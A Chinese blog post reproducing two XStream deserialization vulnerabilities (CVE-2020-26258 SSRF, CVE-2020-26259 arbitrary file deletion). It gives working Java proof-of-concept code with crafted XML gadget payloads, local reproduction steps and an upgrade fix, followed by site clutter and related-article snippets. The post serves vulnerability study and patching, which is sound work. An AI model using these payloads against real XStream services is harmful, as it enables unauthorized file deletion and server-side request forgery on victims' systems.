XStream反序列化漏洞(cve-2020-26258/cve-2020-26259)

最新推荐文章于 2024-06-05 16:45:01 发布
最新推荐文章于 2024-06-05 16:45:01 发布
阅读量3.5k 收藏 10
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/111316471
版权

1.漏洞描述

         XStream是一个常用的Java对象和XML相互转换的工具。在运行XSteam的服务上,未授权的远程攻击者通过构造特定的序列化数据 ,可造成任意文件删除/服务端请求伪造(SSRF) 。

2.影响版本

XStream <= 1.4.14

3.漏洞POC

1)cve-2020-26259:任意文件删除

import com.thoughtworks.xstream.XStream;
/*
CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host
when unmarshalling as long as the executing process has sufficient rights.
https://x-stream.github.io/CVE-2020-26259.html
Security framework of XStream not explicitly initialized, using predefined black list on your own risk.
 */
public class cve_2020_26259 {
    public static void main(String[] args) {
        String xml_poc = "<map>\n" +
                "  <entry>\n" +
                "    <jdk.nashorn.internal.objects.NativeString>\n" +
                "      <flags>0</flags>\n" +
                "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
                "        <dataHandler>\n" +
                "          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
                "            <contentType>text/plain</contentType>\n" +
                "            <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>\n" +
                "              <tempFile>D:/test.txt</tempFile>\n" +
                "            </is>\n" +
                "          </dataSource>\n" +
                "          <transferFlavors/>\n" +
                "        </dataHandler>\n" +
                "        <dataLen>0</dataLen>\n" +
                "      </value>\n" +
                "    </jdk.nashorn.internal.objects.NativeString>\n" +
                "    <string>test</string>\n" +
                "  </entry>\n" +
                "</map>";

        XStream xstream = new XStream();
        xstream.fromXML(xml_poc);
    }

}

2)cve-2020-26258:服务端请求伪造(SSRF)

import com.thoughtworks.xstream.XStream;

import java.io.IOException;

public class cve_2020_26258 {
    public static void main(String[] args) throws IOException {
        String payload = "<map>\n" +
                "  <entry>\n" +
                "    <jdk.nashorn.internal.objects.NativeString>\n" +
                "      <flags>0</flags>\n" +
                "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
                "        <dataHandler>\n" +
                "          <dataSource class='javax.activation.URLDataSource'>\n" +
                "            <url>http://127.0.0.1:8000/ntuser.ini</url>\n" +
                "          </dataSource>\n" +
                "          <transferFlavors/>\n" +
                "        </dataHandler>\n" +
                "        <dataLen>0</dataLen>\n" +
                "      </value>\n" +
                "    </jdk.nashorn.internal.objects.NativeString>\n" +
                "    <string>test</string>\n" +
                "  </entry>\n" +
                "</map>";
        XStream xStream = new XStream();
        xStream.fromXML(payload);

    }
}

4.漏洞复现

1)https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.10-java7/

下载xstream1.4.10版本

 

2)使用IDE创建一个maven工程,命名xstream,会生成pom.xml文件,将pom.xml文件内容替换成下面的代码

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>xstream</artifactId>
    <version>1.0-SNAPSHOT</version>

    <dependencies>

        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.14</version>
        </dependency>
    </dependencies>

</project>

3)将下载的xstream文件放入xstream目录下

 

4)选中工具中的java文件夹,右键->new->Java Class,命名为cve_2020_26258,将cve_2020_26258的POC拷入文件

 

5)输入python3 -m http.server 8000开启本地8000端口,在IDE工具界面右键选择run ‘cve_2020_26258main()’,会访问到POC中的ntuser.ini文件

6)创建cve_2020_26259,将cve_2020_26259的POC拷入文件

7)在IDE工具界面右键选择run ‘cve_2020_26259main()’,会删除在D盘下的test.txt文件

5.修复建议

更新xstream版本。如果是maven管理的项目,直接修改pom.xml中的依赖,修改xstream版本为1.4.15即可,如何是其他方式的,请自行从官网下载使用。

地址:http://x-stream.github.io/download.html

chaojixiaojingang
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
问题记录:XStream ForbiddenClassException 异常
qq_35316141的博客
07-06 4195
XStream ForbiddenClassException 异常解决
XStream的使用
qq_27558875的博客
09-01 457
pom.xml里导入 &lt;!-- https://mvnrepository.com/artifact/com.thoughtworks.xstream/xstream --&gt; &lt;dependency&gt; &lt;groupId&gt;com.thoughtworks.xstream&lt;/groupId&gt; &lt;artifactId&gt;xstream&l...
XStream反序列化
2301_79724395的博客
06-05 1255
这里其实只分析了基础的,后面很多cve都已经不使用这种方式打了,我主要就是了解一下这个漏洞基础解析XML:首先,XStream使用内部的HierarchicalStreamReader(这可能是基于StAX,Xpp,JDOM等的实现)开始解析XML。HierarchicalStreamReader会从XML的开头开始顺序读取所有的元素,并提供读取节点名称,节点值,属性等所有必要的方法。查找对应的Converter:对于每一个读取到的节点,XStream会通过Mapper找到对应的Converter。
XStream 1.4.10 警告: Security framework of XStream not initialized, XStream is probably vulnerable
weixin_30872867的博客
01-20 1938
参考:www.fengyunxiao.cn XStream 1.4.10 出现警告:Security framework of XStream not initialized, XStream is probably vulnerable. 意思是:xstream 的安全框架没有初始化,xstream 容易受攻击。 解决方法:xStream对象设置默认安全防护,同时设置允许的类 ...
JAVA 2018-06-11
qq_34319145的博客
06-11 325
spring定时功能(之前用qutaz感觉配置很多, 这种简单很多)
xstream操作xml
xiaozhuangyumaotao的博客
01-16 2372
一、基本使用 (1)Xstream介绍 Xstream是一种OXMapping 技术,是用来处理XML文件序列化的框架,在将JavaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁索。Xstream也可以将JavaBean序列化成Json或反序列化,使用非常方便。 (2)Xstream的简单例子 pom.xml中引入xstream的依赖: <dependency> <groupId>com.thought...
XStream1.4.16反序列化漏洞CVE-2020-26258CVE-2020-26259
05-08
近日XStream官方发布安全更新,修复了XStream 反序列化漏洞CVE-2020-26258CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
xstream-1.4.15.jar
01-28
XStream 反序列化漏洞CVE-2020-26258 & 26259),修复jar包 xstream-1.4.15.jar Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可证的许可下分发...
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
最新发布
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
xstream解析依赖包
08-18
xpp3_min-1.1.4c.jar xstream-1.3.1.jar
XStream转换Java对象与XML
fxzcollege的专栏
04-13 259
1.引入需要的jar包,在pom.xml中配置依赖 Java代码   &lt;dependency&gt;       &lt;groupId&gt;com.thoughtworks.xstream&lt;/groupId&gt;       &lt;artifactId&gt;xstream&lt;/artifactId&gt;       &lt;version&...
JDK 8 新特性 | Nashorn 脚本引擎
热门推荐
挖坑埋你
06-18 1万+
Nashorn JavaScript 引擎是 Java 8 的一部分,它与其它像 Google V8 (它是 Google Chrome 和 Node.js 的引擎)的独立引擎相互竞争。 Nashorn 扩展了 Java 在 JVM 上运行动态 JavaScript 脚本的能力。 在接下来的大约15分钟里,您将学习如何在 JVM 上动态运行 JavaScript。 通过一些简短的代码示例演...
这本XStream学习手册,真的不来看看?
WANXT1024的博客
06-04 294
一、前言 1、XStream官网 http://x-stream.github.io 2、XStream是什么 XStream是一个简单的基于Java的类库,用来将Java对象序列化成XML(JSON)或反序列化为对象(即:可以轻易的将Java对象和XML文档相互转换) 3、XSteam能干什么 XStream在运行时使用Java反射机制对要进行序列化的对象树的结构进行探索,并不需要对对象作出修改。XStream可以序列化内部字段,包括私private和final字段,并且支持非公开类以及内部类。 在
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8073
多次跳转导致的ssrf
『Java安全』XStream 1.4.15反序列化漏洞CVE-2021-21345复现与浅析
Ho1aAs‘s Blog
08-17 1330
一种绕过黑名单、触发造成RCE的姿势XStream ≤ 1.4.15 PoC XStream怎么序列化和反序列化PriorityQueue? 分析PoC之前先看看XStream是怎么对待PriorityQueue的:PriorityQueue继承了Serializable,因此使用的是SerializableConveter 因此在doMarshal和doUnMarshal时会调用write/readObject 看PoC使用的是优先级队列,CC链的常客了,写一个demo看看XStream是怎么反序.
XStream漏洞编号是 CVE-2021-21351的应对措施
06-11
XStream漏洞编号 CVE-2021-21351 是由于 XStream 序列化时对恶意 XML 转换导致的安全漏洞。以下是一些应对措施: 1. 尽可能升级 XStream 的版本到 1.4.16 或更高版本,因为这些版本已经修复了该漏洞。 2. 如果无法升级到最新版本,可以通过在 XStream 实例中禁用 DTD 解析来缓解此漏洞。可以通过以下代码实现: ``` XStream xstream = new XStream(); xstream.ignoreUnknownElements(); ``` 3. 可以通过限制可反序列化的类或使用安全的转换器来减少攻击面。 4. 将 XStream 序列化作为一个不可信的输入,始终对其进行适当的验证和过滤。 5. 使用其他序列化库,例如 Jackson 或 Gson,来代替 XStream。 以上是一些常见的应对措施,但实际上解决此漏洞的最好方法是升级 XStream 到最新版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值